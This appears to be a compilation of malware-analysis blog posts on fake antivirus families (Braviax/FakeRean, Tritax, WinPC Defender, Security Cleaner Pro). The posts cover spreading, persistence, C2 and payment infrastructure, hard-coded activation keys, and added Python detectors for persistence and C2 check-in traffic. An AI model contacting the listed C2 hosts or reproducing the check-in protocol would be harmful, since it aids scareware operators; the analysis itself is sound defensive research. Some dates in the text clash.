Inside Braviax/FakeRean: An analysis and history of a FakeAV family
Since September 2014 I've been seeing a FakeAV family pop up from time to time. This family is known under two names, Braviax and FakeRean. The family has been active for quite some years; it was first spotted by S!Ri back in April 2009. In this blog post I will analyse the current version of this family making its rounds online and give a history of it starting back in 2009. A big thank you goes out to S!Ri for sharing some historical data on this group.
The reason I'm releasing this article now, on a group that was last active in January of this year, is that if you follow the timeline I show below they should have reappeared around this time of year (although I haven't seen them yet).
The Braviax/Fakerean family has quite some similarities with the Tritax (dubbed NameChanger FakeAV) family I analyzed and hunted down back in February 2014 (Post: Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit). Braviax/Fakerean is also one that constantly changes its name, as you can see from a combination of screenshots made from samples starting in September 2014 until the start of January 2015:
As said, back in September 2014 this new variant became active. After seeing it pass by multiple times I decided to look into it a bit. At some point I started noticing the name changes, because the website, the website banner and the actual 'antivirus' names didn't match up at all; I tweeted about this on the 27th of September:
#FakeAV website calls it 'Rango Antivirus', banner 'Win XP Security', sample run 'A-Secure' (https://t.co/EgYDdzDqFd) pic.twitter.com/i1amKQLsIy
— Yonathan Klijnsma (@ydklijnsma)
November 27, 2014
From this point on I started looking into this FakeAV threat some more, as it started to hit quite often. Quite quickly I could pin this one down as part of the Fakerean/Braviax family and started to analyze it.
Analysis: Spreading mechanism
We'll start the analysis of this family with how it was spread: simply by mail. Around the 18th of December 2014 fake FedEx emails began to appear, one of which carried a method of infecting victims with this FakeAV. The email looked like this:
In the email's attachment we find a JS file:
Inside of this script we find a large piece of obfuscated script:
If we clean it up we can see it's just a simple downloader which tries to infect the user with 3 pieces of malware (shotgun approach much..):
Of the three payloads only one is interesting for this article: the Braviax/FakeRean sample. Should you want to perform a more detailed analysis (rather than the very short one below), the sample coming from this email and used further on is: 1d01611a1f88c7015c54efedacfcbc8fec55ad6de9a438087abff3be78c19901
Quick analysis: a Braviax/FakeRean sample
Because this article is more about the history of this family than about the specifics of the FakeAV, this part will be a very(!) short analysis of the sample.
When run, the FakeAV shows the usual pop-up with information on your system being infected:
Additionally, when you close the window (or try to close the FakeAV program in any way) a fake Windows Security Center window will pop up:
In the process of scaring the user the FakeAV copies itself to a new location and installs a registry startup key, the normal persistence method. The FakeAV also monitors running processes and kills the ones it doesn't like, which includes system utilities like taskmgr but also tools like Wireshark and the like. All of this is to convince the user to buy the 'product' to clean up the 'infection' that stops them from starting these processes.
The FakeAV also performs some C2 communication, which includes information on the payment C2 service:
The client performs a request to the C2 server located at gelun-posak[.]com; the path is an encoded and base64'd unique system ID. The response contains a small config; the partially readable text string 'eo-moquales[.]Nom' is in fact the payment wall, which (after decoding) is golen-mortales[.]com.
Overall this FakeAV is just like any other I've written about in the past. The payment service runs on a separate C2 server while the main C2 server is just for infection registration / statistics. Enough on the malware, let's move on to have a look at this family's history.
The Family
The Braviax/Fakerean FakeAV family has been around for quite some time; @S!Ri first spotted them 6 years ago. Back around April 2009 samples started to appear of a FakeAV naming itself "Home Antivirus 2009", the first of more to come:
Around the start of July it was followed by a 2nd version called "PC Security 2009":
A 3rd version appeared at the end of July already, this time called "Home Antivirus 2010" (even though it was still 2009... they were ahead of their time it seems):
Near the end of August the 4th installment of the family appeared, this time it was called “PC Antispyware 2010”. This one actually loaded an AV database, stolen from ClamAV (in fact an old one from 2007):
Then in September the 5th version appeared, “Antivirus Pro 2010”:
In 2009 5 versions of the Braviax/Fakerean family hit; from September until the end of January 2010 it was quiet and nothing new appeared. At the end of January a completely changed version appeared. This one changed its appearance depending on whether it ran on Windows XP, Vista or 7, and even on each of these platforms it had multiple names. Under Windows XP it called itself one of the following names:
Antivirus XP 2010
XP Guardian
XP Internet Security
Under Windows Vista it called itself one of the following names:
Vista Antivirus Pro 2010
Vista Internet Security 2010
Finally, under Windows 7 it called itself one of the following names:
Win 7 Antispyware 2010
Win 7 Internet Security 2010
An interesting move to have some name mangling dependent on the platform. After they pushed these it stayed quiet until November. In November they released a new version with similar names, only the year was bumped from 2010 to 2011. The Windows XP variants for example:
XP Security 2011
XP Antispyware 2011
In February 2011 a new version appeared with slightly updated names and GUI layout:
XP Anti-Virus 2011
XP Home Security 2011
XP Anti-Spyware
At the end of June 2011 another updated version was released, again with some changes to the OS-based name mangling and an updated GUI:
XP Internet Security 2012
Win7 Internet Security 2012
Another slightly updated version appeared at the end of November 2011, still based on the OS-based name mangling:
In January 2012 a new updated version, mostly GUI changes, got pushed:
At the start of October 2012 another slightly updated version appeared, mostly GUI changes and again still based on the OS version name mangling:
Then almost a year later, at the start of September 2014, the version from my analysis appeared. An entirely updated GUI and new names marked a big change. It appeared under the following names (with OS version names displayed, although not all use it):
Sirius (Win 7|Win 8|Vista) Protection 2014
Zorton (Win 7|Win 8|Vista) Protection 2014
Rango (Win 7|Win 8|Vista) Protection 2014
A-Secure 2015
AVbytes (Win 7|Win 8|Vista) Antivirus 2015
AVC Plus
GUI-wise it looks like this (name stripped as it's templated into the GUI at runtime):
However, at the end of September 2011 a sort of offspring appeared as well, named Advanced PC Shield 2012; another one appeared in August 2012 called Win 8 Security System:
Even though this version is also classed in the Braviax/Fakerean family, it looks somewhat different in setup.
Conclusion
The Braviax/Fakerean family has been around for a long time, appearing as early as April 2009, and seems to be a success as new reincarnations appear every year.
While they aren't as big a threat as banking malware or ransomware, it does pay well for these criminals. Because of their 'low' volume and simply being scareware, not a lot of attention is given to them. I'll be keeping an eye on them for future campaigns for sure though :)
IOCs & Samples
The following is a list of samples for the last version, spreading from September 2014 to December 2014. No new ones have appeared as of writing this blog article.
Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit
This time I'm diving into an active FakeAV campaign which I've named the NameChanger FakeAV; it falls under the Tritax family. As for why I named it the NameChanger, just take a look at the following image composed of screenshots of all the different samples:
Update (27-2-2014): Updated the end of the article with a list of domains and IPs seen in the past 2 months. Tritax is still active and distributing.
Update (20-3-2014): After sinkholing and actively taking down the domains with the help of some friends, it seems the Tritax actors gave up. The TDSs stopped redirecting and no new domains are being registered; taking action against this campaign was successful!
Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695 Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by Invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/ Skype advertisements have also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251
More recently the same campaign was seen by @Malekal redirecting via PopAds-delivered advertisements: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736
David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code
The Tritax family has been around for a long time; the first sample of it was seen around May 2009. The current campaign drops a sample I have named NameChanger.C, as it's the third FakeAV type from this family that is constantly being repackaged with new names.
I'll start off with an analysis of the current version of the FakeAV, after which I'll go into the family; third will be the new FakeAV social engineering kit this group is using in their current campaign. I'll end with a section which is a hash dump of all the samples I've been scraping from their backend.
Analysis
This sample drops from a specialized social engineering kit for FakeAVs; I'll get into the details about this later. The name for this version is "Windows Accelerator Pro", MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).
It initially installs itself in the usual startup location; the key name for these samples is "GuardSoftware":
"GuardSoftware"="C:\\Documents and Settings\\admin\\Application Data\\guard-hqxl.exe"
The filename is formatted as "guard-%s.exe", as can be seen when running the sample through OllyDbg in the image below. Since the 1st or 2nd of February samples are now formatted as "svc-%s.exe".
After the sample has installed itself it will force a reboot to make sure no other analysis tools are started. When it's first run (before the reboot) it will show a splash screen:
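A defender-side check for the persistence described above, added here as an example and not part of the original post: it walks a `.reg` export of the Run keys and flags values whose target matches the "guard-%s.exe" / "svc-%s.exe" naming or the "GuardSoftware" value name. The export text is constructed for the example; only the first value mirrors the one shown in the post.

```python
import re

# Constructed .reg export fragment: the first Run value mirrors the one in the
# post, the others are made up to show a benign entry and the later svc- naming.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GuardSoftware"="C:\\Documents and Settings\\admin\\Application Data\\guard-hqxl.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Documents and Settings\\admin\\Application Data\\svc-ab12.exe"
'''

# A Run key header line, e.g. [HKEY_CURRENT_USER\...\CurrentVersion\Run]
RUN_KEY_RE = re.compile(r"^\[(HKEY_[A-Z_]+)\\(.*\\CurrentVersion\\Run)\]$", re.I)
# A "name"="value" line; .reg files escape backslashes and quotes with a backslash.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Filename patterns from the post: guard-%s.exe, and svc-%s.exe from early February on.
SUSPECT_NAME_RE = re.compile(r"(?:^|\\)(guard|svc)-[^\\]+\.exe$", re.I)


def unescape(s):
    """Undo .reg string escaping (\\\\ -> \\, \\" -> ")."""
    return s.replace("\\\\", "\\").replace('\\"', '"')


def find_tritax_persistence(reg_text):
    """Return (key, value name, target path) for Run values matching the Tritax pattern."""
    hits = []
    current = None  # Run key we are inside, or None while in an unrelated key
    for line in reg_text.splitlines():
        line = line.strip()
        m = RUN_KEY_RE.match(line)
        if m:
            current = m.group(1) + "\\" + m.group(2)
            continue
        if line.startswith("["):
            current = None
            continue
        if current is None:
            continue
        v = VALUE_RE.match(line)
        if not v:
            continue
        name, path = unescape(v.group(1)), unescape(v.group(2))
        if name == "GuardSoftware" or SUSPECT_NAME_RE.search(path):
            hits.append((current, name, path))
    return hits


if __name__ == "__main__":
    for key, name, path in find_tritax_persistence(SAMPLE_REG):
        print(f"{key}\\{name} -> {path}")
```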
Once the machine has rebooted it will show the usual fake scanning with detection of infected items:
Once completed the user gets a listing of all the affected files:
When you attempt to clean up the infections by hitting "Remove All" we get a message regarding activation. You cannot clean up until you activate the product:
Before we activate the 'product' let's have a look around at what it 'can' do for us:
All of course are unavailable to us unless we activate. When enabling one of the options we get the same "Activate" popup.
There's also an about section in the 'product':
Besides the fake scanning and available options it will also show a variety of fake warning messages:
Some more aggressive warnings appear from time to time as well:
We are also, as usual with FakeAVs, not allowed to start any applications because they are 'infected':
It also warns us that we are torrenting and that downloading pirated material is a felony:
When we click the "Get anonymous connection" button we go back to the activation form again. When we hit the "Activate" button we are greeted by a payment form:
The form is retrieved by starting the Microsoft HTA client:
This is the C&C for this FakeAV; all subsequent traffic from this sample will go to this IP.
Now if we go to the "Register" section we can 'activate' the product:
We do need a valid key for this one. The key for this sample is:
1W111-111B1-11T11-E1121
Note: If you have any old infections from before July 2012 the key is "0W000-000B0-00T00-E0020"
When we enter the correct key we are allowed to activate:
As soon as we hit the "Register" button we are taken back to the scan results page and it will start 'cleaning' up the infections:
Now if we look at the application it has all turned green and all 'functionality' is available to us:
The about form is also updated with the activation date and serial:
The application stores the activation data in the registry like this:
The "Config" key holds the activation key as well:
This FakeAV has built-in translations for German, French and Spanish:
I've seen the following IPs for the C&Cs in samples dating from November 2013 until February 2013:
93.115.82.249
93.115.82.248
93.115.86.197
Interesting fact: these guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.
The Family
The FakeAV family that was spreading here is called 'Tritax'. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/
The first sample appeared around May 2009; it was called "Crusader Antivirus":
This one displayed the usual fake warnings and fake scanning like we see now:
This FakeAV was meant to look like the AGAVA Antispy application, which was a legitimate application. Crusader mimicked most of the GUI of Antispy:
This first sample is in fact where the "Tritax" name comes from: on the about dialog a company was listed as "TRITAX Limited":
The sample for this one, MD5: 301b4ca82a0dc6931562e9b322ceb7c1
The 2nd installment of the family was called "SecretService"; this one has had 2 versions:
After the SecretService version, "Privacy Center" and "Safety Center" popped up:
After those we were greeted by "Privacy Center" and "Control Center":
Now we arrive at the first NameChanger variant, which I've named NameChanger.A. It first appeared in December 2010. It has been seen with the following names:
The GUI has had a few changes but the general look stayed the same. A few samples:
After variant A, the B variant, NameChanger.B, appeared in May 2011. It has had the following names:
And looked the same in every sample, only the name constantly changed:
And in February 2012 the first version of our NameChanger.C appeared; it was named 'Windows Protection Manager'.
This shows how long this group has been active: 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they now have a good setup going with the special FakeAV kit.
The full list of used names so far for NameChanger.C:
The Social Engineering Kit
I encountered the first sample when being redirected from the Business Insider website. While initially it seemed like a one-off, I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.
When landing on this kit a user is greeted with a JavaScript alert message:
Then a page is shown with a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:
When clicking the "Clean computer" message the user is prompted with a download named something like "Setup.exe" or "Install.exe". This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an antivirus suddenly comes up talking about infections on your computer.
I have found different FakeAV family campaigns using this kit; the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:
Around the 10th of January the JavaScript on the landing page suddenly changed to an encrypted version.
A week later, on the 17th of January, the landing page changed again, only this time the encrypted JavaScript snippets were put in external files called "scr1.js" and "scr2.js". Landing page code:
During this time the DNS for the Tritax group's landing page always points to a subdomain, one of 'b2811a66', 'c3913c6c', 'e324rfds', 'wed322d2', '5c4e4143' or '90d6bc5a'. Of course this will change from time to time; it just means the main domain never points to the landing server, it's always a subdomain. Additionally, the domains used by this group are registered at registrars allowing for domain tasting (a 5-day testing period, free!). The domains rotate every few days. The first registrar I saw them appear at was Domeny.pl; they are currently being tasted at Key-Systems GmbH. These are the stats in terms of TLDs I have seen:
106 pw
76 nl
30 pl
15 com
Here is a full list of all the domains used in the period from the 1st of January 2014 until the 25th of January 2014.
These domains used custom nameservers; @vriesHD has done his best taking these down over the past months. The IPs I've seen used in this campaign's landing pages are:
The following domains have been seen for the custom nameservers:
In addition to advertisement and spam mail spreading, these guys have also compromised a large number of websites. All compromised websites are WordPress sites. A malicious PHP file was uploaded after exploitation. This file redirects to the domains listed above (and the new ones still being generated). These pages respond with:
Analysis of the "Internet Security" fake antivirus leads to a family of FakeAV and a possible actor behind it
Stumbled upon another one of the FakeAVs; it's called "Internet Security" this time and the detection is decent for once.
Initial payload from exploit kit b4662d40b12250f79ffec121a083ba6e (VT 19/48)
Unpacked payload f77c7098ce70e9e197a37f1264357bf1 (VT 21/48)
Unpacked the 2nd layer dd158a5d2caa7f9df1bba52e51db7c2c (VT 21/48)
Analysis
The sample dropped from Neutrino and after being dropped it started to install itself and show fake security related warnings. It installs itself in %appdata% as avsecurity.exe and a startup key in the usual '\Software\Microsoft\Windows\CurrentVersion\Run' section of the registry.
After it installed itself it made sure it killed all other running processes except Windows Explorer and other default Windows processes. After this it starts displaying its fake warnings:
It also shows popup messages from time to time indicating more problems on the computer:
And again, like we've seen with previous FakeAVs, every single process we try to spawn is killed and marked as 'infected':
After the initial scan finishes it tells us many problems have been found and we need to register before we can clean them up:
We will close that window for now and look around what else this 'antivirus' can do:
Now if we want to modify any of the options we get the message we need to activate:
Now let's get back to the registration: we can either fill in our email and the registration key we paid for, or if we don't have those we can pay to get them. The payment dialogs look like this:
Now of course we aren't going to pay. Back to the activation form:
Putting in junk info will not get it activated sadly:
Now if we attach our favorite debugger we can find out that the key is (as usual) static and any combination of an email address (can be junk info) with that key will work. The key for this "Internet Security" is the same in all samples I've been able to find; the key is:
Y68REW-T76FD1-U3VCF5A
We register successfully now:
We can also finally remove those infections!
And the application itself also shows that it is activated and we now have a 'high security' level:
After rebooting it still knows that we activated it because it writes a lock file called 'avbase.dat' to disk:
The payment pages we saw earlier are web pages loaded using the IE object in a form; the URLs (same order as the screenshots):
On the main tab we see a button saying "License Information...". If we click this it opens a browser loading 'http:// www.3dsecureinternational .com/info.php', which redirects to 'https:// secure.bill3dpayusauto .com/'. If we provide the correct information (email + CC) we can see our subscription status:
All the payment pages, including this customer service page, use SSL from StartSSL, which is free for the first year; the certificate for the customer service page:
In addition to being dropped via exploit kits, you can also just purchase it from their website located at 'http:// securityserviceauto .com'. This allows you to purchase it and see all its 'amazing' features:
All domains seen with this FakeAV:
All IPs seen with this FakeAV:
194.54.80.212
194.54.81.20
194.54.81.101
Statistics
I have been monitoring the backend of this FakeAV and was able to build some statistics. In ~12 hours I saw around 1400 unique IPs contacting the C&C. I saw around 30 successful payments, around 400 clients opened the payment window but never ended up paying, and I saw about 70 clients just visiting the main website.
Of the total number of clients that have paid, their geographical location (in percentages over a time span of a couple of days):
United States: 72%
France: 13%
United Kingdom: 7.5%
Puerto Rico: 4.5%
Australia: 1%
Argentina: 1%
Jamaica: 0.5%
Canada: 0.5%
The family
While reversing this FakeAV I found an interesting string embedded in the sample:
This option is available only in the activated version of WinPC Defender. You must activate the program by entering registration information to use all of its features.
So let's see what this WinPC Defender is about; the hash for the sample of WinPC Defender is 'af736cb7ea46b63f6a1cd9526eaf67a7' (VT: 45/48). Let's infect ourselves with this sample; the main window already looks familiar:
So it seems our actors have been busy; our first sample seems to be an improved and reskinned version. So let's register this version; after looking at it with the debugger the key was found to be:
C79AA343F95B062F000C309C14DE2954
Again any combination of an email address (or junk info) and this key will work to activate this FakeAV:
After restarting, the sample still recognized the activation, because it writes a registry key to store its activation data:
[HKEY_CURRENT_USER\Software\WinPC Defender]
"email"="[email protected]"
"key"="C79AA343F95B062F000C309C14DE2954"
And the main form also changes similar to what we saw with our first sample from "Internet Security":
The domains seen with this FakeAV:
2payon.com (payment processor)
winpcdefender09.com (main C&C)
The IPs seen with these domains:
78.46.88.142
194.165.4.77
After some more research I found another sample which seems to be the version before "WinPC Defender". This one was called 'XP Police Antivirus'. The hash for this sample is "c9e1a1f20501280c5e2caf0fa7c1425a". (VT: 34/48)
Again the main form looks similar, more simplistic, and from what I could tell this is the first version of this family:
If we look at the registration we also see a lot of similarities:
Now if we reverse the registration/activation we find something interesting: the key from 'WinPC Defender' is the same one used by 'XP Police Antivirus'. The key is (again):
C79AA343F95B062F000C309C14DE2954
And after we register it writes similar information to the registry for its start-up check of previous activation:
[HKEY_CURRENT_USER\Software\XP Police Antivirus]
"email"="[email protected]"
"key"="C79AA343F95B062F000C309C14DE2954"
The activation step:
And again the main form looks a lot like the previous samples we looked at after activation:
The domains involved with this FakeAV:
xp-police.com
The IPs seen with these domains:
213.155.10.63
213.163.65.10
Another thing to note is that all of the samples were written in Delphi. We can pretty much tie these 3 samples together as a family; you can also see the evolution of the icon if you put all the shortcuts next to each other:
Conclusion
We can conclude these 3 belong to the same family / authors. They were first seen as "XP Police Antivirus", which appeared around January 2009; this was followed by the "WinPC Defender" variant, which first appeared around June 2009. The current version, "Internet Security", was first seen around October 2013, which leaves a large gap from 2009 to 2013 in which I am unable to link more to this family.
Edit: The gap can be filled with the data S!Ri collected, take a look at his blog here: http://siri-urz.blogspot.fr/search/label/Sig.
I also looked at the registration info on all of the domains, but it seems fake identities were used. I did tie a couple of the email addresses used to Facebook accounts and names, but these ended up being used interleaved so I cannot be sure. Most of them seem to be stolen/abused identities.
The only thing I did notice was that all registrations at first had the name 'Sergey Ryabov' in them with the email address '[email protected]'. The information changed to some kind of privacy service a bit later every time. I was unable to tie this name and/or email address to an identity I could confirm.
Analysis of the "Security Cleaner Pro" fake antivirus
Another one of the FakeAVs; this time it is called "Security Cleaner Pro". Detection is quite low: 4/48 on VT for the loader and 8/48 for the payload.
This sample dropped from Blackhole and installed itself as usual, with a shortcut on the desktop and an icon active in the system tray.
When the loader starts it will try setting up a connection with the C&C to report a new install of the loader. After this it requests a payload. This payload will also check in to report that it has installed properly. After that the FakeAV payload will check in at a regular interval to confirm payment with the C&C. On a network level this looks like this, step by step:
GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1
200 OK (text/html)
GET http://<domain> .tld/index/getsoft/?id=<unique_system_id>&os=<os_info>&advertid=<affiliate_id>&type=1
200 OK (application/octet-stream)
GET http://<domain> .tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2
200 OK (text/html)
GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]
200 OK (text/html)
As you can see, the install check-in with type 1 is the loader and type 2 is the actual FakeAV payload. We get a non-encrypted payload back.
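The check-in sequence above, turned into detection logic as an added example (not code from the original post): it matches the four URL shapes against proxy-log style lines, validates the `os` and `advertid` parameters against the patterns the post gives, and rebuilds the loader -> payload download -> payload install -> license check chain per system ID. The log lines, system ID and affiliate ID are constructed; the two hostnames are the C&C domains named later in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameter shapes taken from the URL patterns in the post.
OS_RE = re.compile(r"^(xp|win7|win8)(pro)?sp[0-9]$")
ADVERTID_RE = re.compile(r"^[0-9]{5}$")
PATHS = {"/index/install/", "/index/getsoft/", "/index/checklic/"}
FULL_CHAIN = ["loader_installed", "payload_download", "payload_installed"]

# Constructed proxy log: "<timestamp> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2013-11-02T10:00:01 10.0.0.5 GET http://wirejournal.biz/index/install/?id=7f3a9c1e&os=xpsp3&advertid=01234&type=1 200
2013-11-02T10:00:02 10.0.0.5 GET http://wirejournal.biz/index/getsoft/?id=7f3a9c1e&os=xpsp3&advertid=01234&type=1 200
2013-11-02T10:00:09 10.0.0.5 GET http://wirejournal.biz/index/install/?id=7f3a9c1e&os=xpsp3&advertid=01234&type=2 200
2013-11-02T10:30:10 10.0.0.5 GET http://lenderspoker.in/index/checklic/?id=7f3a9c1e&os=xpsp3 200
2013-11-02T10:31:00 10.0.0.7 GET http://www.example.com/index.html 200
"""
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def classify(url):
    """Describe a Security Cleaner Pro check-in URL, or return None if it is not one."""
    parts = urlsplit(url)
    if parts.path not in PATHS:
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    sysid, osinfo = q.get("id"), q.get("os", "")
    if not sysid or not OS_RE.match(osinfo):
        return None
    if parts.path == "/index/checklic/":
        stage = "license_check"  # periodic payment check, no advertid/type
    else:
        if not ADVERTID_RE.match(q.get("advertid", "")):
            return None
        if parts.path == "/index/getsoft/":
            stage = "payload_download"
        else:  # install: type=1 is the loader, type=2 the FakeAV payload
            stage = {"1": "loader_installed", "2": "payload_installed"}.get(q.get("type"))
            if stage is None:
                return None
    return {"host": parts.hostname, "system_id": sysid, "os": osinfo,
            "advertid": q.get("advertid"), "stage": stage}


def sequences(log_text):
    """Group matching check-ins by system id, keeping log order and the affiliate id."""
    out = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _ts, client, _method, url, _status = m.groups()
        hit = classify(url)
        if hit is None:
            continue
        entry = out.setdefault(hit["system_id"],
                               {"client": client, "advertid": None, "stages": [], "hosts": set()})
        if hit["advertid"]:
            entry["advertid"] = hit["advertid"]
        entry["stages"].append(hit["stage"])
        entry["hosts"].add(hit["host"])
    return out


def infected_hosts(log_text):
    """System ids whose check-ins show the complete loader -> payload -> install chain."""
    return sorted(sid for sid, e in sequences(log_text).items() if e["stages"][:3] == FULL_CHAIN)


if __name__ == "__main__":
    for sid, e in sequences(SAMPLE_LOG).items():
        print(sid, e["client"], "affiliate", e["advertid"], "->", " > ".join(e["stages"]))
```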
After the payload has been downloaded it is copied to:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe
The filename is fixed and always seems to be the same. One thing to note is that other versions I had installed in %appdata% and set a startup key instead of dropping into the startup folder, like so:
The filename shl.exe seems to be fixed since earlier versions as well.
After having set itself up the application starts with the usual infected scan information:
So yes, the usual: we are infected! Now before digging into the activation let's look around at the application. It features (fake) updating:
The rest of the application shows generic options which are all (obviously) fake and have no function.
You can also contact the support desk via email if you click the button at the top:
From time to time there is also a fake Windows Security Center popup to warn you to activate the AV; the entire dialog is an image and clicking anywhere just brings the FakeAV to the front:
Another trick this FakeAV does is hijack the browser, but only Internet Explorer. When a new process is spawned it will check the filename; if it's named 'iexplorer.exe' it will let it run, otherwise it will be killed. Funnily enough it doesn't seem to be able to pick up new processes fast enough, so if you just start your debugger 5-10 times quickly one of them will not be killed.
The injection in IE looks like this when trying to browse anywhere:
Let's look at the activation of this 'product'. When you click register you will get a page that looks really familiar; it seems to be a generic payment template also used by the Titan AV I wrote about some time ago.
We can pay or put in a registration key ourselves.
If we cancel we get a warning message of how we are unprotected.
And if we enter the wrong information we get a warning.
So we open up our debugger and we figure out how the check works:
A simple string compare with the real key, so to activate this FakeAV we can use the following key, which is hard-coded in all the bins I've tried. The key:
YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ
Now we are licensed and we can 'clean' the infections found during the scan. We are now also allowed to start new applications.
And as we can expect after registration any new scan turns up no infections.
Command and Control Server(s)
So with this FakeAV there are 4 dedicated C&C servers which form the backend. The initial domain seen with the first version I got was wirejournal.biz; after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A-records pointing to:
188.93.210.164 - Russian Federation Moscow Ltd Hosting Service
109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel
109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications
91.240.22.98 - Ukraine Donets'k Wibo Project Llc
After some more checking I was able to find more domains used on these IPs. Not sure what all these are for, but it's a somewhat big list for just a FakeAV:
At the beginning you saw the structure of the check-ins. One of the params given with the check-in is 'advertid'. This refers to an affiliate of the program. The idea is that you sign up, get your own affiliate ID, and spread the loader given to you, which checks in with your personal ID; for every new client you infect with it you get money. As simple as that.
One thing the C&C servers do when serving the loaders or payloads is modify a resource of the PE called 'RCDATA' to hold your personal ID. This way an infection can be led back to the appropriate affiliate for payment. This does mean every affiliate has unique bins. I've been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of specifics for a bin hash I've decided to upload all of them. At the end of the article you will find a section called 'Unique Samples' with their VT link. If you want any of these samples to analyze/play with, send me a message on Twitter or email me.
Additional info
Additionally, when running the FakeAV through my debugger I found the following string in memory: "http://softsupport.info/open.php". This domain is registered to a guy with the email address "[email protected]". If we look this up we get a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get already looks sketchy:
I do not know what this guy is up to, but if you also check the VT entries for those IPs, [95.141.28.79] and [95.141.28.81], you can see tons of DynDNS passing by. If I find out what his connection is to this FakeAV or what he is doing with those servers and domains I'll write another article.